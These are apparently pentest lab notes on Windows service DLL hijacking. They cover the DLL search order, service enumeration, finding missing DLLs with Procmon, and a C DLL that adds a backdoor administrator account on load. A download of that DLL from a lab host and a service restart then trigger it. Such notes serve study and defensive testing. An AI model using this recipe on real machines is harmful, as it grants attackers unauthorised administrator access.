Service DLL Hijacking

Privilege Escalation Windows Services windows

Windows DLL search order

The directory from which the application loaded
The system directory (C:\Windows\System32)
The 16-bit system directory
The Windows directory
The current directory
Directories listed in the PATH variable

Identify candidate

Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
icacls .\Documents\BetaServ.exe

Use Procmon to find missing DLLs

Run C:\tools\Procmon\Procmon64.exe, filter by process and Result == NAME NOT FOUND on .dll. Restart the service to capture loads:

Restart-Service BetaService

Build a malicious DLL

#include <stdlib.h>
#include <windows.h>

BOOL APIENTRY DllMain(HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    switch (ul_reason_for_call) {
        case DLL_PROCESS_ATTACH:
            system("net user dave2 password123! /add");
            system("net localgroup administrators dave2 /add");
            break;
    }
    return TRUE;
}

x86_64-w64-mingw32-gcc myDLL.cpp --shared -o myDLL.dll

Drop and trigger

cd Documents
iwr -uri http://192.168.119.3/myDLL.dll -Outfile myDLL.dll
Restart-Service BetaService
net localgroup administrators